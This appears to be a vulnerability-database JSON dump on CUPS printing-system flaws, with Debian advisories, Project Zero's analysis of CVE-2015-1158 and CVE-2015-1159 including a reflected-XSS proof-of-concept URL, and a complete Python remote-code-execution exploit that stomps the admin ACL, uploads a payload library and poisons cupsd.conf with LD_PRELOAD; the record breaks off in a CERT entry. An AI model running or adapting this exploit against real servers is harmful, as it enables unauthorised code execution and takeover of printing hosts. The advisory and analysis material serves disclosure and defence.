778387\n\nPeter De Wachter discovered that CUPS, the Common UNIX Printing\nSystem, did not correctly parse compressed raster files. By submitting\na specially crafted raster file, a remote attacker could use this\nvulnerability to trigger a buffer overflow.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.5.3-5+deb7u5.\n\nFor the upcoming stable distribution (jessie) and unstable\ndistribution (sid), this problem has been fixed in version 1.7.5-11.\n\nWe recommend that you upgrade your cups packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2015-02-25T18:21:23", "published": "2015-02-25T18:21:23", "id": "DEBIAN:DSA-3172-1:C0A28", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00057.html", "title": "[SECURITY] [DSA 3172-1] cups security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:14:05", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "description": "Package : cups\nVersion : 1.4.4-7+squeeze7\nCVE ID : CVE-2014-9679\nDebian Bug : #778387\n\nPeter De Wachter discovered that CUPS, the Common UNIX Printing\nSystem, did not correctly parse compressed raster files. By submitting\na specially crafted raster file, a remote attacker could use this\nvulnerability to trigger a buffer overflow.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.4.4-7+squeeze7.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.5.3-5+deb7u5.\n\nWe recommend that you upgrade your cups packages.\n\n-- \nBen Hutchings - Debian developer, kernel team member\n", "edition": 7, "modified": "2015-02-27T13:03:36", "published": "2015-02-27T13:03:36", "id": "DEBIAN:DLA-159-1:19AEB", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201502/msg00013.html", "title": "[SECURITY] [DLA 159-1] cups security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:07", "description": "\nCUPS 2.0.3 - Multiple Vulnerabilities", "edition": 1, "published": "2015-06-22T00:00:00", "title": "CUPS 2.0.3 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-22T00:00:00", "id": "EXPLOITPACK:4CB42140E06509F8B1AAEC2A1095ADF4", "href": "", "sourceData": "Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html\n\nAbstract\n\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\n\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\n\nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\n\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\n\nSummary\n\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\n\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\n\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\nBackground\n\nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\n\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\n\nscheduler/ipp.c:1626:\n\n /*\n * Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\n */\n\n for (i = 0; i < attr->num_values; i ++)\n {\n _cupsStrFree(attr->values[i].string.text);\n attr->values[i].string.text = NULL;\n if (attr->values[i].string.language) \u2190 for all values in an attribute\n {\n _cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\n attr->values[i].string.language = NULL;\n }\n }\n\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\n\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\n\nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.\n\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\n\n\nA Reflected XSS in the Web Interface (CVE-2015-1159)\n\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\n\nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\n\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\n<>\"'&\n\n These are replaced with their HTML entity equivalents ('<' etc...).\n\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\n\n if (*s == '<')\n {\n /*\n * Pass <A HREF=\"url\"> and </A>, otherwise quote it...\n */\n\n if (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\n {\n fputs(\"<A HREF=\\\"\", out);\n s += 9;\n\n while (*s && *s != '\\\"')\n {\n if (*s == '&')\n fputs(\"&\", out);\n else\n putc(*s, out);\n\n s ++;\n }\n\n if (*s)\n s ++;\n\n fputs(\"\\\">\", out);\n }\n\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\n\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.\n\nTake this example from templates/help-header.tmp:19:\n\n <P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\n\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.\n\nRequesting the following URI will demonstrate this reflected XSS:\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\n\nThe 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.\n\n\nUpstream Fixes\n\nApple Fix (April 16, 2015):\nhttps://support.apple.com/kb/DL1807\n\nOfficial CUPS fix for downstream vendors (June 8, 2015):\nhttps://www.cups.org/str.php?L4609\nhttp://www.cups.org/blog.php?L1082+I0+Q\n\nProject Zero Bug\n\nFor those interested, the sample exploit can be found here:\n\nhttps://code.google.com/p/google-security-research/issues/detail?id=455\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37336.tar.gz\n\nDisclosure Timeline\n\nMarch 20th, 2015 - Initial notification to Apple\nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\nJune 18th, 2015 - Disclosure + 90 days\nJune 19th, 2015 - P0 publication\n\nAttack Surface Reduction in CUPS 2.0.3+\n\nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs:\n\nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead.\nLD_* and DYLD_* environment variables are blocked when CUPS is running as root.\nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\n\nAcknowledgements\n\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\n\nConclusion\n\nNo one prints anything anymore anyways.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:07", "description": "\nCUPS 2.0.3 - Remote Command Execution", "edition": 1, "published": "2017-02-03T00:00:00", "title": "CUPS 2.0.3 - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "id": "EXPLOITPACK:892E7440DFB4E752F2AA0B87194C551D", "href": "", "sourceData": "#!/usr/bin/python\n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution\n# Google Dork: n/a\n# Date: 2/2/17\n# Exploit Author: @0x00string\n# Vendor Homepage: cups.org\n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2\n# Version: <2.0.3\n# Tested on: Ubuntu 14/15\n# CVE : CVE-2015-1158\nimport os, re, socket, random, time, getopt, sys\nfrom socket import *\nfrom struct import *\n\ndef banner():\n print '''\n lol ty google\n 0000000000000\n 0000000000000000000 00\n 00000000000000000000000000000\n 0000000000000000000000000000000\n 000000000 0000000000\n 00000000 0000000000\n 0000000 000000000000\n 0000000 000000000000000\n 000000 000000000 000000\n0000000 000000000 000000\n000000 000000000 000000\n000000 000000000 000000\n000000 00000000 000000\n000000 000000000 000000\n0000000 000000000 0000000\n 000000 000000000 000000\n 0000000000000000 0000000\n 0000000000000 0000000\n 00000000000 00000000\n 00000000000 000000000\n 0000000000000000000000000000000\n 00000000000000000000000000000\n 000 0000000000000000000\n 0000000000000\n @0x00string\nhttps://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py\n'''\n\ndef usage ():\n print (\"python script.py <args>\\n\"\n \" -h, --help: Show this message\\n\"\n \" -a, --rhost: Target IP address\\n\"\n \" -b, --rport: Target IPP service port\\n\"\n \" -c, --lib /path/to/payload.so\\n\"\n \" -f, --stomp-only Only stomp the ACL (no postex)\\n\"\n \"\\n\"\n \"Examples:\\n\"\n \"python script.py -a 10.10.10.10 -b 631 -f\\n\"\n \"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\")\n exit()\n\ndef pretty (t, m):\n if (t is \"+\"):\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"-\"):\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"*\"):\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\n elif (t is \"!\"):\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\n\ndef createDump (input):\n d, b, h = '', [], []\n u = list(input)\n for e in u:\n h.append(e.encode(\"hex\"))\n if e == '0x0':\n b.append('0')\n elif 30 > ord(e) or ord(e) > 128:\n b.append('.')\n elif 30 < ord(e) or ord(e) < 128:\n b.append(e)\n\n i = 0\n while i < len(h):\n if (len(h) - i ) >= 16:\n d += ' '.join(h[i:i+16])\n d += \" \"\n d += ' '.join(b[i:i+16])\n d += \"\\n\"\n i = i + 16\n else:\n d += ' '.join(h[i:(len(h) - 0 )])\n pad = len(' '.join(h[i:(len(h) - 0 )]))\n d += ' ' * (56 - pad)\n d += ' '.join(b[i:(len(h) - 0 )])\n d += \"\\n\"\n i = i + len(h)\n\n return d\n\nclass tcpsock:\n def __init__(self, sock=None):\n if sock is None:\n self.sock = socket(\n AF_INET, SOCK_STREAM)\n self.sock.settimeout(30)\n else:\n self.sock = sock\n def connect(self, host, port):\n self.sock.connect((host, int(port)))\n def tx(self, msg):\n self.sock.send(msg)\n def rx(self):\n tmp = self.sock.recv(1024)\n msg = \"\"\n while tmp:\n msg += tmp\n tmp = self.sock.recv(1024)\n return msg\n\ndef txrx (ip, port, proto, txpacket):\n if (proto is \"tcp\"):\n sock = tcpsock()\n elif (proto is \"udp\"):\n sock = udpsock()\n else:\n return None\n sock.connect(ip, port)\n sock.tx(txpacket)\n rxpacket = sock.rx()\n return rxpacket\n\ndef locatePrinters(rhost, rport=\"631\"):\n request = ( \"GET /printers HTTP/1.1\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n response = txrx(rhost, int(rport), \"tcp\", request)\n if response is not None:\n m = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)\n if m is not None:\n printer = m.group(1)\n pretty(\"+\",\"printer found: \" + printer)\n return printer\n else:\n pretty(\"-\",\"no printers\")\n exit(1)\n else:\n pretty(\"-\",\"no printers\")\n exit(1)\n\ndef preparePayload(libpath):\n with open(libpath, 'rb') as f:\n payload = f.read()\n if payload is not None:\n pretty(\"*\",\"Payload:\\n\" + createDump(payload))\n else:\n pretty(\"-\",\"something went wrong\")\n usage()\n return payload\n\ndef seedTarget(rhost, rport, printer, payload):\n i = random.randint(1,3)\n reqid = str(pack(\">i\",(i+2)))\n reqid2 = str(pack(\">i\",(i+3)))\n printer_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer\n\n create_job_packet = (\"\\x02\\x00\"\n \"\\x00\\x05\"+\n reqid+\n \"\\x01\"\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\n \"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\"\n \"\\x02\"\n \"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\n \"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\"\n \"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\"\n \"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\"\n \"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\"\n \"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\"\n \"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\n \"\\x03\")\n pretty(\"*\",\"Sending createJob\")\n\n http_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n createJobRequest = http_header1 + create_job_packet\n blah = txrx(rhost,int(rport),\"tcp\",createJobRequest)\n if blah is not None:\n m = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah)\n if m is not None:\n jobid = m.group(1)\n else:\n pretty(\"-\",\"something went wrong\");\n exit()\n\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\n pretty(\"*\", \"Sending sendJob\")\n\n send_document_packet = (\"\\x02\\x00\"\n \"\\x00\\x06\"+\n reqid2+\n \"\\x01\"\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\n \"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) +\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\n \"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\"\n \"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\"\n \"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\"\n \"\\x03\"+\n payload)\n\n http_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n sendJobRequest = http_header2 + send_document_packet\n blah2 = txrx(rhost,int(rport),\"tcp\",sendJobRequest)\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\n pretty(\"*\",\"job id: \" + jobid)\n return jobid\n\ndef stompACL(rhost, rport, printer):\n i = random.randint(1,1024)\n printer_url = \"ipp://\" + rhost + \":\" + rport + printer\n\n admin_stomp = (\"\\x02\\x00\" # vers 2.0\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\n str(pack(\">i\",(i+1)))+\n \"\\x01\" # op attributes marker\n \"\\x47\" # charset\n \"\\x00\\x12\" # name len: 18\n \"attributes-charset\"\n \"\\x00\\x08\" # val len: 8\n \"us-ascii\"\n \"\\x48\" # natural language\n \"\\x00\\x1b\" # name len: 27\n \"attributes-natural-language\"\n \"\\x00\\x06\" # val len: 6\n \"/admin\"\n \"\\x45\" # printer-uri\n \"\\x00\\x0b\" # name len 11\n \"printer-uri\" +\n str(pack(\">h\", len(printer_url))) + printer_url +\n \"\\x42\" # name without lang\n \"\\x00\\x14\" # name len: 20\n \"requesting-user-name\"\n \"\\x00\\x06\" # val len: 6\n \"/admin\"\n \"\\x02\" # job attrs marker\n \"\\x21\" # integer\n \"\\x00\\x06\" # name len: 6\n \"copies\"\n \"\\x00\\x04\" # val len: 4\n \"\\x00\\x00\\x00\\x01\" # 1\n \"\\x42\" # name w/o lang\n \"\\x00\\x19\" # name len: 25\n \"job-originating-host-name\"\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x36\" # nwl\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x16\" # val len: 22\n \"\\x00\\x06\" # length\n \"/admin\"\n \"\\x00\\x0c\"\n \"BBBBBBBBBBBB\"\n \"\\x03\") # end of attributes\n\n conf_stomp = (\"\\x02\\x00\" # vers 2.0\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\n str(pack(\">i\",(i+2)))+\n \"\\x01\" # op attributes marker\n \"\\x47\" # charset\n \"\\x00\\x12\" # name len: 18\n \"attributes-charset\"\n \"\\x00\\x08\" # val len: 8\n \"us-ascii\"\n \"\\x48\" # natural language\n \"\\x00\\x1b\" # name len: 27\n \"attributes-natural-language\"\n \"\\x00\\x0b\" # val len: 11\n \"/admin/conf\"\n \"\\x45\" # printer-uri\n \"\\x00\\x0b\" # name len 11\n \"printer-uri\" +\n str(pack(\">h\", len(printer_url))) + printer_url +\n \"\\x42\" # name without lang\n \"\\x00\\x14\" # name len: 20\n \"requesting-user-name\"\n \"\\x00\\x0b\" # val len: 11\n \"/admin/conf\"\n \"\\x02\" # job attrs marker\n \"\\x21\" # integer\n \"\\x00\\x06\" # name len: 6\n \"copies\"\n \"\\x00\\x04\" # val len: 4\n \"\\x00\\x00\\x00\\x01\" # 1\n \"\\x42\" # name w/o lang\n \"\\x00\\x19\" # name len: 25\n \"job-originating-host-name\"\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x36\" # nwl\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x1b\" # val len: 27\n \"\\x00\\x0b\" # length\n \"/admin/conf\"\n \"\\x00\\x0c\"\n \"BBBBBBBBBBBB\"\n \"\\x03\") # end of attributes\n\n http_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n http_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n pretty(\"*\",\"stomping ACL\")\n pretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp))\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp)))\n time.sleep(1)\n pretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp))\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp)))\n\n http_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n pretty(\"*\",\"checking /admin\")\n pretty(\"*\",\">:\\n\" + createDump(http_header_check))\n res = txrx(rhost,rport,\"tcp\",http_header_check)\n pretty(\"*\",\"<:\\n\" + createDump(res))\n m = re.search('200 OK', res)\n if m is not None:\n pretty(\"+\",\"ACL stomp successful\")\n else:\n pretty(\"-\",\"exploit failed\")\n exit(1)\n\n\ndef getConfig(rhost, rport):\n i = random.randint(1,1024)\n original_config = \"\"\n http_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n pretty(\"*\",\"grabbing configuration file....\")\n res = txrx(rhost,rport,\"tcp\",http_request)\n res_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\")\n original_config = res_array[1]\n pretty(\"*\",\"config:\\n\" + original_config + \"\\n\")\n return original_config\n\ndef putConfig(rhost, rport, config):\n http_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Keep-Alive\\x0d\\x0a\"\n \"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n pretty(\"*\",\"overwriting config...\")\n pretty(\"*\",\">:\\n\" + createDump(http_request + config))\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config)))\n\ndef poisonConfig(config, name):\n config = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d000\" + name + \"-001\\x0a\"\n return config\n\ndef main():\n rhost = None;\n rport = None;\n noshell = None;\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help'])\n for opt, arg in options:\n if opt in ('-h', '--help'):\n usage()\n elif opt in ('-a','--rhost'):\n rhost = arg;\n elif opt in ('-b','--rport'):\n rport = arg;\n elif opt in ('-c','--lib'):\n libpath = arg;\n elif opt in ('-f','--stomp-only'):\n noshell = 1;\n banner()\n if rhost is None or rport is None:\n usage()\n pretty(\"*\",\"locate available printer\")\n printer = locatePrinters(rhost, rport)\n pretty(\"*\",\"stomp ACL\")\n stompACL(rhost, rport, printer)\n if (noshell is not None):\n pretty(\"*\",\"fin\")\n exit(0)\n pretty(\"*\",\"prepare payload\")\n payload = preparePayload(libpath)\n pretty(\"*\",\"spray payload\")\n jobid = seedTarget(rhost, rport, printer, payload)\n pretty(\"*\",\"grab original config\")\n OG_config = getConfig(rhost, rport)\n pretty(\"*\",\"generate poison config\")\n evil_config = poisonConfig(OG_config, jobid)\n pretty(\"*\",\"upload poison config\")\n putConfig(rhost, rport, evil_config)\n pretty(\"*\",\"fin\")\n exit(0);\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "### Overview \n\nCUPS implements the Internet Printing Protocol (IPP) for UNIX-derived operating systems. Various versions of CUPS are vulnerable to a privilege escalation due to a memory management error.\n\n### Description 